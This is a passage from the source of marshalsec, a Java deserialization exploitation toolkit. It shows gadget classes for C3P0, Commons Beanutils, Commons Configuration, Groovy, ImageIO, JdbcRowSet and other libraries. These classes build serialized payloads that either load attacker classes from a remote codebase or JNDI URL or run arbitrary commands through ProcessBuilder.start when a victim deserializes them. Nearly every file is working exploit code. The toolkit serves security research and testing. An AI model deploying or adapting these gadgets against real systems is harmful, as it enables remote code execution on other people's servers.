org.apache.commons.codec.binary.Hex; 37 | 38 | import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource; 39 | 40 | import marshalsec.MarshallerBase; 41 | import marshalsec.UtilFactory; 42 | import marshalsec.util.Reflections; 43 | 44 | 45 | /** 46 | * @author mbechler 47 | * 48 | */ 49 | public interface C3P0WrapperConnPool extends Gadget { 50 | 51 | @Primary 52 | @Args ( minArgs = 2, args = { 53 | "codebase", "class" 54 | }, defaultArgs = { 55 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 56 | } ) 57 | default Object makeWrapperConnPool ( UtilFactory uf, String[] args ) throws Exception { 58 | WrapperConnectionPoolDataSource obj = Reflections.createWithoutConstructor(com.mchange.v2.c3p0.WrapperConnectionPoolDataSource.class); 59 | Reflections.setFieldValue(obj, "userOverridesAsString", makeC3P0UserOverridesString(args[ 0 ], args[ 1 ])); 60 | return obj; 61 | } 62 | 63 | 64 | public static String makeC3P0UserOverridesString ( String codebase, String clazz ) throws ClassNotFoundException, NoSuchMethodException, 65 | InstantiationException, IllegalAccessException, InvocationTargetException, IOException { 66 | 67 | ByteArrayOutputStream b = new ByteArrayOutputStream(); 68 | try ( ObjectOutputStream oos = new ObjectOutputStream(b) ) { 69 | Class refclz = Class.forName("com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized"); //$NON-NLS-1$ 70 | Constructor con = refclz.getDeclaredConstructor(Reference.class, Name.class, Name.class, Hashtable.class); 71 | con.setAccessible(true); 72 | Reference jndiref = new Reference("Foo", clazz, codebase); 73 | Object ref = con.newInstance(jndiref, null, null, null); 74 | oos.writeObject(ref); 75 | } 76 | 77 | return "HexAsciiSerializedMap:" + Hex.encodeHexString(b.toByteArray()) + ";"; //$NON-NLS-1$ 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/ClassFiles.java: -------------------------------------------------------------------------------- 1 | package marshalsec.gadgets; 2 | 3 | 4 | import java.io.ByteArrayOutputStream; 5 | import java.io.IOException; 6 | import java.io.InputStream; 7 | 8 | 9 | public class ClassFiles { 10 | 11 | public static String classAsFile ( final Class clazz ) { 12 | return classAsFile(clazz, true); 13 | } 14 | 15 | 16 | public static String classAsFile ( final Class clazz, boolean suffix ) { 17 | String str; 18 | if ( clazz.getEnclosingClass() == null ) { 19 | str = clazz.getName().replace(".", "/"); 20 | } 21 | else { 22 | str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); 23 | } 24 | if ( suffix ) { 25 | str += ".class"; 26 | } 27 | return str; 28 | } 29 | 30 | 31 | @SuppressWarnings ( "resource" ) 32 | public static byte[] classAsBytes ( final Class clazz ) { 33 | try { 34 | final byte[] buffer = new byte[1024]; 35 | final String file = classAsFile(clazz); 36 | final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file); 37 | if ( in == null ) { 38 | throw new IOException("couldn't find '" + file + "'"); 39 | } 40 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 41 | int len; 42 | while ( ( len = in.read(buffer) ) != -1 ) { 43 | out.write(buffer, 0, len); 44 | } 45 | return out.toByteArray(); 46 | } 47 | catch ( IOException e ) { 48 | throw new RuntimeException(e); 49 | } 50 | } 51 | 52 | } 53 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/CommonsBeanutils.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.util.Collections; 27 | 28 | import org.apache.commons.beanutils.BeanComparator; 29 | 30 | import marshalsec.MarshallerBase; 31 | import marshalsec.UtilFactory; 32 | import marshalsec.util.Reflections; 33 | 34 | 35 | /** 36 | * @author mbechler 37 | * 38 | */ 39 | public interface CommonsBeanutils extends Gadget { 40 | 41 | @Primary 42 | @Args ( minArgs = 1, args = { 43 | "jndiUrl" 44 | }, defaultArgs = { 45 | MarshallerBase.defaultJNDIUrl 46 | } ) 47 | default Object makeCommonsBeanutilsJNDI ( UtilFactory uf, String... args ) throws Exception { 48 | BeanComparator cmp = new BeanComparator<>("lowestSetBit", Collections.reverseOrder()); 49 | Object trig = uf.makeComparatorTrigger(JDKUtil.makeJNDIRowSet(args[ 0 ]), cmp); 50 | Reflections.setFieldValue(cmp, "property", "databaseMetaData"); 51 | return trig; 52 | } 53 | 54 | } 55 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/CommonsConfiguration.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.lang.reflect.Constructor; 27 | import java.lang.reflect.InvocationTargetException; 28 | import java.util.Collections; 29 | 30 | import javax.naming.NamingException; 31 | import javax.naming.directory.DirContext; 32 | 33 | import org.apache.commons.configuration.Configuration; 34 | import org.apache.commons.configuration.JNDIConfiguration; 35 | import org.apache.commons.logging.impl.NoOpLog; 36 | 37 | import marshalsec.MarshallerBase; 38 | import marshalsec.UtilFactory; 39 | import marshalsec.util.Reflections; 40 | 41 | 42 | /** 43 | * @author mbechler 44 | * 45 | */ 46 | public interface CommonsConfiguration extends Gadget { 47 | 48 | @Args ( minArgs = 2, args = { 49 | "codebase", "class" 50 | }, defaultArgs = { 51 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 52 | } ) 53 | @Primary 54 | default Object makeConfigurationMap ( UtilFactory uf, String[] args ) throws Exception { 55 | Object jc = makeConfiguration(uf, args); 56 | Class cl = Class.forName("org.apache.commons.configuration.ConfigurationMap"); 57 | Constructor cons = cl.getDeclaredConstructor(Configuration.class); 58 | cons.setAccessible(true); 59 | return uf.makeHashCodeTrigger(cons.newInstance(jc)); 60 | } 61 | 62 | 63 | @Args ( minArgs = 2, args = { 64 | "codebase", "class" 65 | }, defaultArgs = { 66 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 67 | } ) 68 | default Object makeConfiguration ( UtilFactory uf, String[] args ) throws ClassNotFoundException, NoSuchMethodException, InstantiationException, 69 | IllegalAccessException, InvocationTargetException, NamingException, Exception { 70 | DirContext ctx = JDKUtil.makeContinuationContext(args[ 0 ], args[ 1 ]); 71 | 72 | JNDIConfiguration jc = new JNDIConfiguration(); 73 | jc.setContext(ctx); 74 | jc.setPrefix("foo"); 75 | 76 | Reflections.setFieldValue(jc, "errorListeners", Collections.EMPTY_LIST); 77 | Reflections.setFieldValue(jc, "listeners", Collections.EMPTY_LIST); 78 | Reflections.setFieldValue(jc, "log", new NoOpLog()); 79 | return jc; 80 | } 81 | 82 | } 83 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/Gadget.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | /** 27 | * @author mbechler 28 | * 29 | */ 30 | public interface Gadget { 31 | 32 | } 33 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/GadgetType.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | /** 27 | * @author mbechler 28 | * 29 | */ 30 | public enum GadgetType { 31 | 32 | UnicastRef(UnicastRefGadget.class), 33 | UnicastRemoteObject(UnicastRemoteObjectGadget.class), 34 | Groovy(Groovy.class), 35 | SpringPropertyPathFactory(SpringPropertyPathFactory.class), 36 | SpringPartiallyComparableAdvisorHolder(SpringPartiallyComparableAdvisorHolder.class), 37 | SpringAbstractBeanFactoryPointcutAdvisor(SpringAbstractBeanFactoryPointcutAdvisor.class), 38 | Rome(Rome.class), 39 | XBean(XBean.class), 40 | Resin(Resin.class), 41 | CommonsConfiguration(CommonsConfiguration.class), 42 | LazySearchEnumeration(LazySearchEnumeration.class), 43 | BindingEnumeration(BindingEnumeration.class), 44 | ServiceLoader(ServiceLoader.class), 45 | ImageIO(ImageIO.class), 46 | CommonsBeanutils(CommonsBeanutils.class), 47 | C3P0WrapperConnPool(C3P0WrapperConnPool.class), 48 | C3P0RefDataSource(C3P0RefDataSource.class), 49 | JdbcRowSet(JdbcRowSet.class), 50 | ScriptEngine(ScriptEngine.class), 51 | Templates(Templates.class), 52 | ResourceGadget(ResourceGadget.class), 53 | 54 | // 55 | ; 56 | 57 | private Class clazz; 58 | 59 | 60 | private GadgetType ( Class clazz ) { 61 | this.clazz = clazz; 62 | } 63 | 64 | 65 | /** 66 | * @return the clazz 67 | */ 68 | public Class getClazz () { 69 | return this.clazz; 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/Groovy.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import org.codehaus.groovy.runtime.MethodClosure; 27 | 28 | import groovy.util.Expando; 29 | import marshalsec.MarshallerBase; 30 | import marshalsec.UtilFactory; 31 | 32 | 33 | /** 34 | * @author mbechler 35 | * 36 | */ 37 | public interface Groovy extends Gadget { 38 | 39 | @Primary 40 | @Args ( minArgs = 1, args = { 41 | "cmd", "args.." 42 | }, defaultArgs = { 43 | MarshallerBase.defaultExecutable 44 | } ) 45 | default Object makeGroovyMap ( UtilFactory uf, String[] args ) throws Exception { 46 | Object e = makeGroovy(args); 47 | return uf.makeHashCodeTrigger(e); 48 | } 49 | 50 | 51 | @Args ( minArgs = 1, args = { 52 | "cmd", "args.." 53 | }, defaultArgs = { 54 | MarshallerBase.defaultExecutable 55 | } ) 56 | default Object makeGroovy ( String[] args ) throws Exception { 57 | Expando expando = new Expando(); 58 | ProcessBuilder pb = new ProcessBuilder(args); 59 | MethodClosure mc = new MethodClosure(pb, "start"); 60 | expando.setProperty("hashCode", mc); 61 | return expando; 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/ImageIO.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.lang.reflect.Constructor; 27 | import java.lang.reflect.InvocationTargetException; 28 | import java.lang.reflect.Method; 29 | import java.util.Collections; 30 | 31 | import marshalsec.MarshallerBase; 32 | import marshalsec.UtilFactory; 33 | import marshalsec.util.Reflections; 34 | 35 | 36 | /** 37 | * @author mbechler 38 | * 39 | */ 40 | public interface ImageIO extends Gadget { 41 | 42 | @Args ( minArgs = 1, args = { 43 | "cmd", "args..." 44 | }, defaultArgs = { 45 | MarshallerBase.defaultExecutable 46 | } ) 47 | @Primary 48 | default Object makeImageIO ( UtilFactory uf, String[] args ) throws Exception { 49 | ProcessBuilder pb = new ProcessBuilder(args); 50 | Class cfCl = Class.forName("javax.imageio.ImageIO$ContainsFilter"); 51 | Constructor cfCons = cfCl.getDeclaredConstructor(Method.class, String.class); 52 | cfCons.setAccessible(true); 53 | 54 | // nest two instances, the 'next' of the other one will be skipped, 55 | // the inner instance then provides the actual target object 56 | Object filterIt = makeFilterIterator( 57 | makeFilterIterator(Collections.emptyIterator(), pb, null), 58 | "foo", 59 | cfCons.newInstance(ProcessBuilder.class.getMethod("start"), "foo")); 60 | 61 | return uf.makeIteratorTrigger(filterIt); 62 | } 63 | 64 | 65 | public static Object makeFilterIterator ( Object backingIt, Object first, Object filter ) 66 | throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, Exception { 67 | Class fiCl = Class.forName("javax.imageio.spi.FilterIterator"); 68 | Object filterIt = Reflections.createWithoutConstructor(fiCl); 69 | Reflections.setFieldValue(filterIt, "iter", backingIt); 70 | Reflections.setFieldValue(filterIt, "next", first); 71 | Reflections.setFieldValue(filterIt, "filter", filter); 72 | return filterIt; 73 | } 74 | } 75 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/JdbcRowSet.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import marshalsec.MarshallerBase; 27 | import marshalsec.UtilFactory; 28 | 29 | 30 | /** 31 | * @author mbechler 32 | * 33 | */ 34 | public interface JdbcRowSet extends Gadget { 35 | 36 | @Primary 37 | @Args ( minArgs = 1, args = { 38 | "jndiUrl" 39 | }, defaultArgs = { 40 | MarshallerBase.defaultJNDIUrl 41 | } ) 42 | default Object makeJdbcRowSet ( UtilFactory uf, String[] args ) throws Exception { 43 | return JDKUtil.makeJNDIRowSet(args[ 0 ]); 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/LazySearchEnumeration.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import marshalsec.MarshallerBase; 27 | import marshalsec.UtilFactory; 28 | 29 | 30 | /** 31 | * @author mbechler 32 | * 33 | */ 34 | public interface LazySearchEnumeration extends Gadget { 35 | 36 | @Args ( minArgs = 2, args = { 37 | "codebase", "class" 38 | }, defaultArgs = { 39 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 40 | } ) 41 | default Object makeLazySearchEnumeration ( UtilFactory uf, String[] args ) throws Exception { 42 | return uf.makeIteratorTrigger(JDKUtil.adaptEnumerationToIterator(JDKUtil.makeLazySearchEnumeration(args[ 0 ], args[ 1 ]))); 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/MockProxies.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.lang.reflect.InvocationHandler; 27 | import java.lang.reflect.InvocationTargetException; 28 | import java.lang.reflect.Method; 29 | import java.lang.reflect.Proxy; 30 | import java.util.HashMap; 31 | import java.util.Map; 32 | 33 | import com.google.inject.internal.Annotations; 34 | 35 | import marshalsec.util.Reflections; 36 | 37 | 38 | /** 39 | * @author mbechler 40 | * 41 | */ 42 | public class MockProxies { 43 | 44 | public enum MockProxyType { 45 | GUICE, HIBERNATEVAL, JAVA 46 | } 47 | 48 | 49 | public static Object makeProxy ( MockProxyType t, String method, Object iter, Class... types ) throws ClassNotFoundException, 50 | NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, Exception { 51 | switch ( t ) { 52 | case GUICE: 53 | return makeProxyGuice(method, iter, types); 54 | case HIBERNATEVAL: 55 | return makeProxyHibernate(method, iter, types); 56 | case JAVA: 57 | default: 58 | return makeProxyJava(method, iter, types); 59 | } 60 | } 61 | 62 | 63 | private static Object makeProxyJava ( String method, Object iter, Class... types ) throws ClassNotFoundException, NoSuchMethodException, 64 | InstantiationException, IllegalAccessException, InvocationTargetException, Exception { 65 | Map values = new HashMap<>(); 66 | values.put(method, iter); 67 | return Proxy.newProxyInstance(MockProxies.class.getClassLoader(), types, JDKUtil.createMemoizedInvocationHandler(values)); 68 | } 69 | 70 | 71 | private static Object makeProxyGuice ( String method, Object iter, Class... types ) throws Exception { 72 | Method meth = Annotations.class.getDeclaredMethod("generateAnnotationImpl", Class.class); //$NON-NLS-1$ 73 | meth.setAccessible(true); 74 | Object o = meth.invoke(null, Override.class); 75 | InvocationHandler inv = Proxy.getInvocationHandler(o); 76 | Map values = new HashMap<>(); 77 | values.put(method, iter); 78 | Reflections.setFieldValue(inv, "val$members", values); 79 | return Proxy.newProxyInstance(MockProxies.class.getClassLoader(), types, inv); 80 | } 81 | 82 | 83 | private static Object makeProxyHibernate ( String method, Object iter, Class... types ) throws ClassNotFoundException, NoSuchMethodException, 84 | InstantiationException, IllegalAccessException, InvocationTargetException, Exception { 85 | Class invhcl = Class.forName("org.hibernate.validator.util.annotationfactory.AnnotationProxy"); 86 | InvocationHandler invh = (InvocationHandler) Reflections.createWithoutConstructor(invhcl); 87 | Map values = new HashMap<>(); 88 | values.put(method, iter); 89 | Reflections.setFieldValue(invh, "values", values); 90 | 91 | return Proxy.newProxyInstance(MockProxies.class.getClassLoader(), types, invh); 92 | } 93 | 94 | } 95 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/Primary.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.lang.annotation.Retention; 27 | import java.lang.annotation.RetentionPolicy; 28 | 29 | 30 | /** 31 | * @author mbechler 32 | * 33 | */ 34 | @Retention ( RetentionPolicy.RUNTIME ) 35 | public @interface Primary { 36 | 37 | } 38 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/Resin.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.lang.reflect.Constructor; 27 | import java.util.Hashtable; 28 | 29 | import javax.naming.CannotProceedException; 30 | import javax.naming.Reference; 31 | import javax.naming.directory.DirContext; 32 | 33 | import com.caucho.naming.QName; 34 | 35 | import marshalsec.MarshallerBase; 36 | import marshalsec.UtilFactory; 37 | import marshalsec.util.Reflections; 38 | 39 | 40 | /** 41 | * @author mbechler 42 | * 43 | */ 44 | public interface Resin extends Gadget { 45 | 46 | @Args ( minArgs = 2, args = { 47 | "codebase", "class" 48 | }, defaultArgs = { 49 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 50 | } ) 51 | default Object makeResinQName ( UtilFactory uf, String[] args ) throws Exception { 52 | 53 | Class ccCl = Class.forName("javax.naming.spi.ContinuationDirContext"); //$NON-NLS-1$ 54 | 